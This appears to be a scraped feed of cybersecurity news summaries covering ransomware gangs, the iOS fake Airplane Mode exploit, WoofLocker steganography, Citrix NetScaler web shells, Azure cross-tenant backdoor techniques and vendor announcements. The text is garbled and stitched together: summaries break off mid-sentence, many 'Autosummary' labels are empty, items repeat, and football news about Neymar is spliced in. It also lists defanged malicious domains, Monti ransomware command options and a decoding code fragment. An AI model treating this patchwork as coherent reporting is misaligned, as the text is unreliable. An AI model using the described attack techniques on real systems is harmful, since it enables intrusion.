Triple Extortion Ransomware in Context: The Broader Cybercrime Ecosystem The broader cybercrime ecosystem also acts as a crucial enabler for ransomware groups by offering services like bulletproof hosting, money laundering, initial access to environments, and employee credentials via stealer logs. An IAB advertises access to a European company for $250 Source: Flare In many cases, we have seen access brokers advertise that they have access to a victim"s backup and recovery systems or that the victim lacks backup and recovery, providing further evidence that IABs expect their listings to be used for ransomware. "Autosummary:
Airplane Mode, as the name implies, allows users to turn off wireless features in their devices, effectively preventing them from connecting to Wi-Fi networks, cellular data, and Bluetooth as well as sending or receiving calls and text messages. "Autosummary:
"The attacker utilized undetected signature-based tools, sophisticated and stealthy cross-platform malware, command-and-control (C2) tools which bypassed firewalls, and kernel-based rootkits to hide their presence," Sysdig said in a report shared with The Hacker News. "The world’s most popular websites lack basic cybersecurity hygiene, an investigation by Cybernews shows. Do you happen to love exploring DIY ideas on Pinterest? Scrolling through IMDB to pick the next movie to watch? Or simply scrolling through Facebook to see what your friends and enemies have been up to? The Cybernews research team has […]
The post Alarming lack of cybersecurity practices on world’s most popular websites appeared first on Security Affairs.
"Autosummary:
Why does any of this matter Give a look at the original post at: Original post at: https://cybernews.com/security/most-popular-websites-cyber-hygiene/ About the author: Jurgita Lapienytė, Chief Editor at CyberNews Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, popular websites) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On As per our researchers, the most common attacks include: Phishing Cross-site scripting (XSS) Man-in-the-middle (MITM) attacks that usually occur on free public wifi or other open networks “Security headers are important security layers. "Researchers detailed a new exploit for Apple iOS 16 that can allow attackers to gain access to a device even when the victim believes it is in Airplane Mode. Jamf Threat Labs researchers developed a post-exploit persistence technique on iOS 16 that trick victims into believing that the device is in functional Airplane Mode. In […]
The post Experts devise an exploit for Apple iOS 16 that relies on fake Airplane Mode appeared first on Security Affairs.
"Autosummary:
Below is a video PoC of the exploit: https://vimeo.com/user100736884 Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Apple iOS 16 exploit) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
However, it is more commonly used as a post-exploitation toolkit by penetration testers, red teamers, and threat actors to spread laterally on a network, dump credentials from processes, perform NTLM relay attacks, and much more. "Categories: Threat Intelligence Tags: tech support scams Tags: fingerprinting Tags: steganography This tech support scam is one of the most long running and covert ones we have ever seen. |
The post Catching up with WoofLocker, the most elaborate traffic redirection scheme to tech support scams appeared first on Malwarebytes Labs.
"Autosummary:
Indicators of Compromise Fingerprinting and redirection infrastructure: api[.]cloudcachestels[.]com api[.]cloudseedzedo[.]com api[.]imagecloudsedo[.]com appcloudzedo[.]com cdn[.]contentob[.]com cdncontentstorage[.]com cdnpictureasset[.]com cloudcusersyn[.]com cloudgertopage[.]com cloudlogobox[.]com csscloudstorage[.]com datacloudasset[.]com logosvault[.]com miniassetcloud[.]com Recent browser locker domains: furakelw[.]com gopilofan[.]com zemolist[.]com besoliza[.]com vedopixt[.]com defolis[.]com somawan[.]com vulidoc[.]com barustan[.]com semilupa[.]com bopiland[.]com somalics[.]com sebasong[.]com molesanu[.]com xepilondi[.]com malubana[.]com beeronas[.]com lobosixt[.]com gomoyad[.]com[] for i in range(len(imgdata)): tt.append(imgdata[i][0]) tt.append(imgdata[i][1]) tt.append(imgdata[i][2]) for i in range(len(tt)): ar = 57 ^ tt[i] if ar >= 32: data += chr(ar) open(sys.argv[1]+".decode", "w").write(data) Figure 5: Decoded output from PNG image URL redirection We were able to identify the redirection URL this time, after numerous replays and debugging attempts: Figure 6: Browser locker URL is sent hidden in PNG image Again, the threat actor uses steganography to include JavaScript code inside of an image. Originally, the injected code was not obfuscated and contained the fingerprinting checks but in 2021 the threat actors changed it, to simply the injection and move some of the logic outside: Figure 2: Code injected into compromised sites (comparison) In the image below, we are using Chrome"s Developer Tools to see malicious code dynamically injected into the DOM. "Categories: Exploits and vulnerabilities Categories: News Tags: Citrix Tags: NetScalers Tags: Germany Tags: CVE-2023-3519 Tags: Fox-IT Tags: DIVD Researchers have found almost 2000 backdoored Citrix NetScalers, many of which were patched after the backdoor in the form of a web shell was dropped. |
The post Citrix NetScalers backdoored in widespread exploitation campaign appeared first on Malwarebytes Labs.
"Autosummary:
Prevention, detection and response If your Citrix server hasn’t been updated to a secure version, we strongly advise you to patch it as soon as possible, especially if you’re utilizing any of the following features: SSL VPN ICA Proxy CVPN RDP Proxy AAA virtual server If you are not using one of these servers, we still recommend that you patch to a non-vulnerable version to prevent your appliance from becoming vulnerable when you start using one of these functions in the future. There are several resources available that document the in-the-wild exploitation of Citrix appliances where forensic artifacts can be found: https://www.shadowserver.org/news/technical-summary-of-observed-citrix-cve-2023-3519-incidents/ https://www.mandiant.com/resources/blog/citrix-zero-day-espionage https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-201a https://support.citrix.com/article/CTX561482/citrix-adc-and-citrix-gateway-security-bulletin-for-cve20233519-cve20233466-cve20233467 Fox-IT has provided a Python script that utilizes Dissect to perform triage on forensic images of NetScalers. "The SEC adopted rules requiring registrants to disclose material cybersecurity incidents they experience and to disclose on an annual basis material information regarding their cybersecurity risk management, strategy, and governance. The Commission also adopted rules requiring foreign private issuers to make comparable disclosures. In this Help Net Security video, Doug Barbin, President and National Managing Principal at Schellman, shares his perspective on what this means for enterprises moving forward. To accomplish the requirements of the … More
The post SEC cybersecurity rules shape the future of incident management appeared first on Help Net Security.
"Autosummary:
"Password security remains highly relevant even as cybersecurity strategies move toward a passwordless future. Of the 100 Black Hat USA 2023 attendees Delinea polled, 54% said passwordless is a viable concept, while 79% agreed that passwords are evolving or becoming obsolete. When asked how they protect their passwords, most attendees surveyed indicated they use an additional authentication method to secure their credentials and identity. 73% use some form of multi-factor authentication (MFA), 57% specifically indicated … More
The post Passwordless is more than a buzzword among cybersecurity pros appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
"Bitdefender has launched an advanced security feature for iOS users, Scam Alert. The new technology protects users from phishing scams delivered through SMS/MMS messages and calendar invites. Layered on top of existing protection in Bitdefender Mobile Security for iOS, Scam Alert proactively identifies attacks and prevents them from reaching the mobile user – providing iPhone and iPad users complete, layered protection. Cybercriminals are increasingly targeting Apple operating systems dispelling a common myth that little or … More
The post Bitdefender enhances security for iOS devices with Scam Alert appeared first on Help Net Security.
"Autosummary:
“Threat actors are incredibly resourceful at leveraging social engineering efforts to steal money or personal information,” said Ciprian Istrate, SVP of operations, Consumer Solutions Group at Bitdefender. "Autosummary:
Protect your business against stolen credentials With a full 49% of breaches involving stolen credentials and evolving digital black markets, such as Genesis, tools dedicated to detecting compromised passwords are vital for overworked IT departments. Verizon"s DBIR noted that 74% of breaches include the human element, either through human error, privilege misuse, social engineering, or stolen credentials. "Autosummary:
"Although the proxy website claims that its exit nodes come only from users who have been informed and agreed to the use of their device, Alien Labs has evidence that malware writers are installing the proxy silently in infected systems," AT&T Alien Labs "In addition, as the proxy application is signed, it has no anti-virus detection, going under the radar of security companies," the researchers added. "Autosummary:
Roughly one-third (29%) of the 1,000 emails attributed to this campaign targeted a large US energy company, while the remaining attempts were made against firms in manufacturing (15%), insurance (9%), technology (7%), and financial services (6%). "Autosummary:
"Stellar Cyber has unveiled that the Stellar Cyber Open XDR platform is available on Oracle Cloud Infrastructure (OCI) to help users manage their security operations. Joint customers of Oracle and Stellar Cyber can expect to reduce cyber risk and improve security analyst efficiency and effectiveness. “We find that OCI is a user-friendly platform, which correlates directly to our commitment to making security operations simpler,” said Andrew Homer, VP of Strategic Alliances for Stellar Cyber. “We … More
The post Stellar Cyber and OCI partner to offer expanded cybersecurity capabilities appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Since then, Clop has conducted numerous data-theft campaigns using zero-day flaws in SolarWinds Serv-U, GoAnywhere MFT, and, most recently, the massive attacks on MOVEit Transfer servers. "Autosummary:
Since then, Clop has conducted numerous data-theft campaigns using zero-day flaws in SolarWinds Serv-U, GoAnywhere MFT, and, most recently, the massive attacks on MOVEit Transfer servers. "Categories: News Tags: FBI Tags: warning Tags: beta-testing Tags: malicious code Tags: crypto recovery Tags: scammers The FBI has issued a warning about two related types of fraud, malicious beta-testing apps and crypto recovery schemes. |
The post Beware malware posing as beta versions of legitimate apps, warns FBI appeared first on Malwarebytes Labs.
"Autosummary:
The agency says it’s aware of fraud schemes where the victims are contacted and directed to download mobile beta-testing apps, such as cryptocurrency exchanges, that steal money instead of investing it.For criminals, "beta-testing" apps offer a plausible reason for vicitms to donwload software from unsafe places, away from the usual app stores, without raising their suspicions. "US CISA added critical vulnerability CVE-2023-24489 in Citrix ShareFile to its Known Exploited Vulnerabilities catalog. US Cybersecurity and Infrastructure Security Agency (CISA) added critical flaw CVE-2023-24489 (CVSS score 9.8) affecting Citrix ShareFile to its Known Exploited Vulnerabilities Catalog. Citrix ShareFile is a secure file sharing and storage platform designed for businesses and professionals to collaborate on documents, exchange […]
The post CISA adds flaw in Citrix ShareFile to its Known Exploited Vulnerabilities catalog appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, CISA) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On “A vulnerability has been discovered in the customer-managed ShareFile storage zones controller which, if exploited, could allow an unauthenticated attacker to remotely compromise the customer-managed ShareFile storage zones controller.” "A phishing campaign employing QR codes targeted a leading energy company in the US, cybersecurity firm Cofense reported. Starting from May 2023, researchers from Cofense discovered a large-scale phishing campaign using QR codes in attacks aimed at stealing the Microsoft credentials of users from multiple industries One of the organizations targeted by hackers is a […]
The post A massive phishing campaign using QR codes targets the energy sector appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, QR codes) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share OnOther top 4 targeted industries include Manufacturing, Insurance, Technology, and Financial Services seeing 15%, 9%, 7%, and 6% of the campaign traffic respectively.” "Autosummary:
Neymar won trophies at PSG but also struggled with injuries 2021-23 - Ups and downs as end approaches Neymar once again teamed up with former Barcelona team-mate Messi when the Argentina star joined PSG in August 2021, but that season was a disappointing one for Neymar as he finished with 13 goals in all competitions - his worst return since moving to Europe. 2016 - Record-breaking season and Olympic gold Neymar, Messi and Suarez continued to be one of the most deadly strike trios in club football and in 2015-16 they combined to score 131 goals - the most in a season for an attacking trio in Spanish football history. 2013 - Barcelona and Brazil success Luis Suarez, Lionel Messi and Neymar became a formidable attacking trio at Barcelona Having helped Santos win the Copa Libertadores in 2011 - their first since 1963 - Neymar joined Barcelona after being linked with a string of top European clubs. "Comprehensive security plans and programs must focus on defense, but also on answering these key question: “How will the organization respond to a ransomware attack?”, and “At what point will the option of paying the ransom be on the table?” What are the key considerations that must be made to reach an answer? Paying the ransom – key considerations 1. Paying funds cybercrime activity The more ransoms organizations pay, the more profitable ransomware attacks are … More
The post Ransomware: To pay or not to pay appeared first on Help Net Security.
"Autosummary:
This includes: Educating employees on ransomware and how it gets into systems and how user accounts are targeted Running a regular patch management process, complemented with proactive red teaming Scheduling regular backups and regularly testing the backup and data recovery process Implementing segmentation across networks and systems to stop attacks from spreading once attackers gain a foothold On top of this, when organizations are building out their security programs, they must focus on how best to respond to attacks to minimize disruptions.When building out security programs, organizations must understand the cost of downtime per hour and the losses they stand to endure if a ransomware attack happens (this could relate to reputation, contractual obligations, share price and employee productivity).If you pay once, you’ll most likely get hit again When an organization pays a ransom, the news circulates among cybercrime gangs and it makes it more likely that the business will get hit again. "Autosummary:
Join Graham Cluley, renowned cybersecurity expert and host of the Smashing Security podcast, and Mike Britton, CISO at Abnormal Security, for an illuminating webinar that delves into the world of credential phishing and offers actionable insights. Understanding the Lure: How attackers manipulate victims into submitting credentials, employing tactics such as generative AI. "Autosummary:
These actors typically target the United States, Europe, and South Korea, with a focus on targeting government agencies, military organizations, businesses, and financial institutions.His deep technical expertise includes penetration testing, security architectures, intrusion detection, and computer forensics, providing consultancy to large government and private organizations. "Autosummary:
On the other hand, Gigabud.Loan functions as a tool to collect personal information such as full name, identity number, national identity document photo, digital signature, education, income info, bank card information, and phone number under the guise of submitting a loan request to the bank. While Android devices have the "Install from Unknown Sources" setting disabled by default as a security measure to prevent the installation of apps from untrusted sources, the operating system allows other apps on installed on the device, such as web browsers, email clients, file managers, and messaging apps, to request the "REQUEST_INSTALL_PACKAGES" permission. "Autosummary:
The malware steals data from over 60 applications, including login credentials, credit card information, browsing history, cookies, and cryptocurrency wallet accounts. "Autosummary:
Protect against catastrophe with up-to-date offline backups If the worst has happened, and a ransomware attack has taken down a school’s network, up-to-date and offline-stored backups are crucial to getting the students back in the classroom. The FBI (Federal Bureau of Investigation), CISA, and the MS-ISAC warned about Vice Society and the threat it poses to education sectors in a joint Cybersecurity Advisory (CSA): “School districts with limited cybersecurity capabilities and constrained resources are often the most vulnerable; however, the opportunistic targeting often seen with cyber criminals can still put school districts with robust cybersecurity programs at risk. Remote connections – Remote Desktop Protocol (RDP), Teamviewer, VNC, etc. Persistent installations – Unexpected startup programs or scheduled task creations. Specops Password Policy with Breached Password Protection is popular with schools, universities, and local governments due to cost-effectiveness, quick implementation, and ease of end-user use. "Autosummary:
Details of the four flaws are as follows - CVE-2023-33871 (CVSS score: 7.5) - A directory traversal vulnerability that could allow an unauthenticated user to directly access any file outside the server"s webroot. "Autosummary:
"Autosummary:
"Categories: Business PCMag readers named Malwarebytes the #1 most-recommended security software vendor in its list of Best Tech Brands for 2023. |
The post PCMag ranks Malwarebytes #1 cybersecurity vendor appeared first on Malwarebytes Labs.
"Autosummary:
Award-winning EDR Solution Malwarebytes EDR has been recognized for having the Best Support, being Easiest to Do Business With, having the Easiest Admin, being the Easiest to Use, Most Implementable, and the Easiest to Set Up.- Dennis Davis, IT Systems Manager, Drummond Try Malwarebytes for Business today Most of all, we appreciate the trust and support of our customers in making Malwarebytes the #1 cybersecurity solution for IT teams and MSPs. "Categories: Exploits and vulnerabilities Categories: News Tags: Ford Tags: Lincoln Tags: SYNC 3 Tags: CVE-2023-29468 Tags: TI WLink Tags: MCP driver A vulnerability in the SYNC 3 infotainment will not have a negative effect on driving safety, says Ford. |
The post Ford says it’s safe to drive its cars with a WiFi vulnerability appeared first on Malwarebytes Labs.
"Autosummary:
And even if an attacker were to gain RCE on the SYNC 3 system using this vulnerability, the potential damage would be limited, since the system is isolated from critical control functions like steering, throttling, and braking. "Categories: News Categories: Personal We put Malwarebytes Browser Guard up against the top 25 websites. It knocked out 172 trackers and other unwanted items. |
The post 25 most popular websites vs Malwarebytes Browser Guard appeared first on Malwarebytes Labs.
"Autosummary:
Cross-site ad tracking follows you from site to site and builds up a rough picture of your likes, dislikes, and demographics, which is then used to help ad providers choose relevant, targeted ads to show you (or at least, that"s the theory.) Among many other things, the third-party components are allowed to alter the code of the page you"re looking at in any way they like, they can all see anything you type into a form on that page, even if you don"t submit it, and they can copy any authentication cookies you have for that site too, which effectively means they can steal your password. Efficient threat distribution The first is that ad distribution networks—the amazingly efficient, just-in-time auction houses that fill ad slots as a page loads—are just as good at distributing scams, links to phishing sites, and malware downloads, as they are at distributing ads. "Monti Ransomware operators returned, after a two-month pause, with a new Linux variant of their encryptor. The Monti ransomware operators returned, after a two-month break, with a new Linux version of the encryptor. The variant was employed in attacks aimed at organizations in government and legal sectors. The Monti group has been active since June 2022, […]
The post Monti Ransomware gang launched a new Linux encryptor appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Monti Ransomware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On Argument Description –help Displays arguments usage –path <string> Path to be encrypted –whitelist <string> List of VMs to be skipped –vmkill Option to Kill virtual machine (VM) –detach Detach from terminal –size removed –log removed –vmlist removed The researchers observed that the developers also tampered with the /etc/motd and index.html files, replacing their contents with a ransom note. "Researchers found several flaws in the ScrutisWeb ATM fleet monitoring software that can expose ATMs to hack. Researchers from the Synack Red Team found multi flaws (CVE-2023-33871, CVE-2023-38257, CVE-2023-35763 and CVE-2023-35189) in the ScrutisWeb ATM fleet monitoring software that can be exploited to remotely hack ATMs. ScrutisWeb software is developed by Lagona, it allows to […]
The post Hacking ATMs by exploiting flaws in ScrutisWeb ATM fleet software appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, ScrutisWeb ATM) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Autosummary:
"The National Institute of Standards and Technology (NIST) released a discussion draft for possible Cybersecurity Framework (CSF) changes earlier this year. The proposed changes aim to help increase the CSF’s clarity and bring the updated version closer to national and international cybersecurity standards and practices. In this Help Net Security video, Ahmik Hindman, Sr. Network & Security Solution Consultant at Rockwell Automation, discusses the evolving cybersecurity landscape and what the new cybersecurity framework could mean … More
The post How manufacturers can navigate cybersecurity regulations amid NIST 2.0 appeared first on Help Net Security.
"Autosummary:
"Action1 Corporation has released a new version of its solution. The updated Action1 patch management platform brings together vulnerability discovery and remediation, helping enterprises fortify their defenses against threats such as ransomware infections and security breaches. The real-time detection of vulnerabilities across the enterprise fleet of endpoints is based on data about 200,000+ vulnerabilities from multiple external threat intelligence sources, provides instant visibility into them for better prioritization decisions, and allows automated remediation of these … More
The post Action1 platform update bridges the gap between vulnerability discovery and remediation appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
"JanelaRAT mainly targets financial and cryptocurrency data from LATAM bank and financial institutions," Zscaler ThreatLabz researchers Gaetano Pellegrino and Sudeep Singh said, adding it "abuses DLL side-loading techniques from legitimate sources (like VMWare and Microsoft) to evade endpoint detection. "Autosummary:
Comment promoting fake crypto recovery services (BleepingComputer) While social media, especially Twitter, has been attempting to crack down on these scams, they are still plagued by cryptocurrency support and recovery scams. "Autosummary:
Code similarity rate on Bindiff (Trend Micro) Among the significant modifications that Trend Micro observed are the following: Removal of the ‘--size,’ ‘--log,’ and ‘–vmlist’ parameters and addition of a new ‘-type=soft’ parameter to terminate ESXi virtual machines (VMs) in a subtler manner that is more likely to evade detection. "Autosummary:
"Autosummary:
Identifying the owners of those compromised computers as hackers, or at least hacker enthusiasts, was possible by looking at the data from the info-stealer logs, which also exposed the individual’s real identity: Additional credentials found on the computers (additional emails, usernames) Auto-fill data containing personal information (names, addresses, phone numbers) System information (computer names, IP addresses) In a previous blog post, Hudson Rock describes how a prominent threat actor called La_Citrix, known for selling Citrix/VPN/RDP access to companies, accidentally infected their computer. "Autosummary:
"Autosummary:
the section European Football Neymar scored for Paris St-Germain in their pre-season friendly against Jeonbuk Hyundai Motors Paris St-Germain have agreed a deal to sell Brazil forward Neymar to Saudi Pro League side Al-Hilal for about 90m euros (£77.6m) plus add-ons. "A few months ago when Cristiano [Ronaldo] was the only one to go, no-one thought this many top, top players would play in the Saudi league," the City manager said. "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Zoom CISO Michael Adams discusses cybersecurity threats, solutions, and the future In this Help Net Security interview, we delve into the world of cybersecurity with Michael Adams, the CISO at Zoom. Adams analyzes how organizations grapple with the effects of workforce shortages and remote work complications, offering insights into best practices for safeguarding products and services in this challenging era. … More
The post Week in review: 8 free cybersecurity docus, vulnerable Intel Core processors, Black Hat USA 2023 appeared first on Help Net Security.
"Autosummary:
New infosec products of the week: August 11, 2023 Here’s a look at the most interesting products from the past week, featuring releases from Adaptive Shield, LastPass, NetSPI, Solvo, ThreatConnect, and Vicarius Downfall attacks can gather passwords, encryption keys from Intel processors A variety of Intel Core processors and the devices using them are vulnerable to “Downfall”, a new class of attacks made possible by CVE-2022-40982, which enables attackers to access and steal sensitive data such as passwords, encryption keys, and private data from other users on the same personal or cloud computer. "Autosummary:
Furthermore, the rep explains, because voter records on the "open register" are often reported to credit bureaus, and used for online identity verification, those who do not keep their details up to date could face problems when applying for credit or utilities: "You may also have difficulty in getting credit for mortgages, credit cards and mobile phones, as the register is often used to carry out credit checks. Some caution, how the confusion associated with the domain can be leveraged by scammers to create lookalike phishing domains: Residents caution against potential phishing domains "For info, someone has camped on householdresponse(s).com for ads, it could cause confusion and also someone could use for a phishing attack," cautioned UK-based Jason Dean, who works in the banking software industry. "Autosummary:
Researchers identified inconsistencies in the bailiwick checking of prominent DNS software, including BIND9 (CVE-2021-25220), Knot Resolver (CVE-2022-32983), Microsoft DNS, and Technitium (CVE-2021-43105). "Autosummary:
Different Cyclops ransomware encryptors Source: BleepingComputer In addition to their normal encryptors, the operation offers a "lite" version for use in spam and pray-and-spray mass distribution campaigns targeting large numbers of targeted users. When encrypting files, it will append the .knight_l extension to encrypted files" names, where the "l" portion likely stands for "lite." "Autosummary:
"Malware, being one of the most prevalent and pervasive initial threat vectors, continues to adapt and become more sophisticated, according to OPSWAT. Crucial role of threat intelligence Threat actors leverage malware as an initial foothold to infiltrate targeted infrastructures and move laterally to gain long-term access, cause damage, or exfiltrate data and trade secrets. To combat these threats effectively, organizations rely on actionable threat intelligence gathered through sandboxes and advanced malware analysis technologies and processes. … More
The post Threat intelligence’s key role in mitigating malware threats appeared first on Help Net Security.
"Autosummary:
"Like many leaders in the cybersecurity space, the professional journey of Mihoko Matsubara did not necessarily begin with securing devices or technology. However, once she discovered it, she was hooked. Discussing her career path with the Left to Our Own Devices podcast and how it opened her eyes to a world of security, Mihoko explained how she went from curiosity to university in Washington, D.C., became a Senior Security Analyst at Hitachi, then VP Public … More
The post Cybersecurity as a global, multi-sector activity with Mihoko Matsubara appeared first on Help Net Security.
"Autosummary:
Discussing her career path with the Left to Our Own Devices podcast and how it opened her eyes to a world of security, Mihoko explained how she went from curiosity to university in Washington, D.C., became a Senior Security Analyst at Hitachi, then VP Public Sector Chief Security Officer at Palo Alto, and to her current position as the Chief Cybersecurity Strategist at NTT Japan.Everybody, including the central government, local government, big companies, academia saw it as a wakeup call,” said Mihoko. "Autosummary:
"Autosummary:
"Autosummary:
"Ransomware will continue to disrupt industrial operations, whether through the integration of operational technology (OT) kill processes into ransomware strains, flattened networks allowing ransomware to spread into OT environments, or precautionary shutdowns of production by operators to prevent ransomware from spreading to industrial control systems," the company assessed with high confidence. "Autosummary:
In 2018, the Dutch police seized MaxiDed for hosting DDoS botnets, cyber-espionage, malvertising, spam, and malware operations. "Autosummary:
"Autosummary:
" Europol says that Lolek was seized as cybercriminals used its servers to launch DDoS attacks, distribute information-stealing malware, host command and control servers, host fake online shops, and conduct spam campaigns. "Autosummary:
Contributors and those who provided new ransomware information and stories this week include: @Seifreed, @struppigel, @Ionut_Ilascu, @serghei, @LawrenceAbrams, @malwrhunterteam, @billtoulas, @demonslay335, @BleepinComputer, @HHSGov, @TrendMicro, @TalosSecurity, @_CPResearch_, @IRS_CI, and @pcrisk. August 7th 2023 Talos assesses with high confidence that this threat actor is targeting victims in English-speaking countries, Bulgaria, China and Vietnam, as the actor’s GitHub account, “nguyenvietphat,” has ransomware notes written in these countries’ languages. "Categories: News Tags: hospital Tags: healthcare Tags: ransomware Tags: hijack Tags: network Tags: compromise Tags: data Tags: ambulance Tags: service Tags: redirect A widespread ransomware attack affecting 16 hospitals last week has led to ongoing cleanup efforts. |
The post Several hospitals still counting the cost of widespread ransomware attack appeared first on Malwarebytes Labs.
"Autosummary:
When it first made an appearance on our Ransomware Review in July of this year, we said the following: Rhysida, a new ransomware gang claiming to be a "cybersecurity team," has been in operation since May 17, 2023, making headlines for their high-profile attack against the Chilean Army.Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.They primarily attack education, government, manufacturing, and technology and managed service provider sectors; however, there has been recent attacks against the Healthcare and Public Health (HPH) sector.The healthcare facilities located in Connecticut, Pennsylvania, Rhode island, and California had the ransomware attack confirmed by the FBI. "Categories: Threat Intelligence Tags: exploit kits Tags: eks Tags: rigek Tags: purplefoxek Internet Explorer may be a thing of the past, but there are still users and threat actors trying to deliver drive-by downloads. |
The post Old exploit kits still kicking around in 2023 appeared first on Malwarebytes Labs.
"Autosummary:
"Some ten years ago, the authors of The Second Machine Age wrote that “computers and other digital advances are doing for mental power—the ability to use our brains to understand and shape our environments—what the steam engine and its descendants did for muscle power.” Many physical jobs were lost to machines, and according to the authors computers and IT technology were going to do the same to jobs that require cognitive skills. Should cybersecurity practitioners … More
The post Will AI kill cybersecurity jobs? appeared first on Help Net Security.
"Autosummary:
In 1980, senior management of Wells Fargo predicted that due to growth in electronic transactions, the number of bank branches will shrink dramatically, whilst the remaining branches would have “few, if any, support staff members”; and by 1984 more than 40% of US households owned ATM cards.And indeed, according to the AI in Medical Imaging Market report, during the period of 2021–2030, the global market for AI in medical imaging is expected to grow at a CAGR of 36.87%, from an estimated $1.24 billion in 2021 to an estimated $20.9 billion. "In the face of rising cyber threats, the healthcare sector has become a hotbed for cyberattacks. Given the gravity of this situation, we sat down with Shenny Sheth, Deputy CISO at Centura Health, who sheds light on the contributing factors making healthcare organizations vulnerable, the role of legacy IT systems, common network monitoring mistakes, patterns in data breaches, and the financial implications of these attacks. This conversation also delves into the complexities of partnerships and … More
The post Learning from past healthcare breaches to fortify future cybersecurity strategies appeared first on Help Net Security.
"Autosummary:
As Centura Health does, US-based organizations could stave from non-compliance with laws, regulations or ethical standards, including conflict of interest, resulting in censure from regulators, litigations, and/or adverse impacts by adopting proper compliance framework, such as The HITRUST Common Security Framework (HITRUST CSF) that provides structure for practices, accountabilities and sufficiently resourced cybersecurity program to serves to data confidentiality and privacy obligations.In light with that learning, healthcare organizations must: (1) Embrace plans to shift away from unsupported (or end-of-life) software in service of critical infrastructure and national critical functions (NCF), and (2) move to password-less, multi-factor, multi-device vouching services to deter malicious Initial Access or Remote Code Execution (RCE) to prevent entry into the critical infrastructure and NCF space. "Autosummary:
"Black Axe, and an increasing number of other West African organized crime syndicates, is a violent mafia-style gang renowned for cyber-enabled financial fraud, in particular business email compromise schemes, romance scams, inheritance scams, credit card fraud, tax fraud, advance payment scams and money laundering," the agency noted. "Autosummary:
If you do have a backup that works, then you not only have the hassle of restoring your systens, but you may also worry about the damage which could be done to your brand, your customer relationships, and partnerships if the Rhysida group follows through on its threats and publishes stolen data on the dark web. "The potential ramifications of this could be dire, including the sale, publication, or distribution of your data to competitors or media outlets. Rhysida is a Windows-based ransomware operation that has come to prominence since May 2023, after being linked to a series of high profile cyber attacks in Western Europe, North and South America, and Australia. "SentinelOne has launched Singularity Ranger Insights. The solution removes the complexity from vulnerability management, enabling companies to continuously discover unmanaged assets, evaluate and prioritize threats and mitigate risk using a single console and agent. “Today’s work-from-anywhere world has opened the door to an increasing number of vulnerabilities, and when it comes to managing them, the stakes have never been higher,” said Lana Knop, VP of Product Management, Endpoint and Identity Products, SentinelOne. “More than 25 … More
The post SentinelOne enhances vulnerability management through Singularity Ranger Insights appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Figure 3: Compromised Account deploying Cross Tenant Access Policy in compromised tenant Figure 4: Compromised account enabling Inbound Sync into the tenant Figure 5: Compromised account enabling Automatic User Consent Redemption Attacker actions that would occur prior to the attack such as the account access following a token theft or other forms of account compromise, would be alerted on by Vectra detections like Azure AD Unusual Scripting Engine Usage, Azure AD Suspicious Sign-on or Azure AD Suspicious OAuth Application. Terminologies Source tenant Tenant from where users & groups are getting synced Target tenant Tenant with resources where users & groups are getting synced Resources Microsoft applications (Teams, SharePoint, etc.) and non-Microsoft applications (ServiceNow, Adobe, etc.)N/A Technique 1: Lateral Movement An attacker operating in a compromised environment can exploit an existing CTS configuration tenant to move laterally from one tenant to another connected tenant. Cross-Tenant Synchronization CTS is a new feature from Microsoft that enables organizations to synchronize users and groups from other source tenants and grant them access to resources (both Microsoft and non-Microsoft applications) in the target tenant. Scenario 2: Backdoor An attacker operating in a compromised tenant can deploy a rogue Cross Tenant Access configuration to maintain persistent access. "Autosummary:
EvilProxy was first documented by Resecurity in September 2022, detailing its ability to compromise user accounts associated with Apple iCloud, Facebook, GoDaddy, GitHub, Google, Dropbox, Instagram, Microsoft, NPM, PyPI, RubyGems, Twitter, Yahoo, and Yandex, among others. "Lookout launched Lookout SAIL, a new generative artificial intelligence (gen AI) assistant that will reshape the way cybersecurity professionals interact with Lookout Mobile Endpoint Security and Lookout Cloud Security solutions and conduct cybersecurity analysis and data protection. In the rapidly evolving landscape of cybersecurity, companies are engaged in an ongoing battle against cyber criminals who are constantly innovating new tactics. As cyber threats become increasingly sophisticated, every organization faces challenges such as a growing skills … More
The post Lookout SAIL improves efficiency for cybersecurity professionals appeared first on Help Net Security.
"Autosummary:
It’s the start of a journey that fundamentally transforms how people interact with systems and information, touching everything from onboarding to training, as well as cybersecurity tasks like administration, policy creation, incident response, and threat hunting,” said Aaron Cockerill, Chief Strategy Officer, Lookout. "Appdome has unveiled that Bugcrowd joined its new Mobile App Defense Project, a community program aimed at improving mobile DevSecOps for everyone. This collaboration aims to create a more secure mobile app economy, raise the bar on mobile app defense, and provide rapid, validated, continuous cyber and anti-fraud solutions for all mobile applications globally. As mobile application use and revenues continue to rise dramatically, mobile application security testing is a hot topic and fast emerging … More
The post Appdome and Bugcrowd join forces to create a more secure mobile app economy appeared first on Help Net Security.
"Autosummary:
"Autosummary:
SYK Crypter, on the other hand, is a tool employed to distributed a wide variety of malware families such as AsyncRAT, NanoCore RAT, njRAT, QuasarRAT, RedLine Stealer, and Warzone RAT (aka Ave Maria). "Autosummary:
"Autosummary:
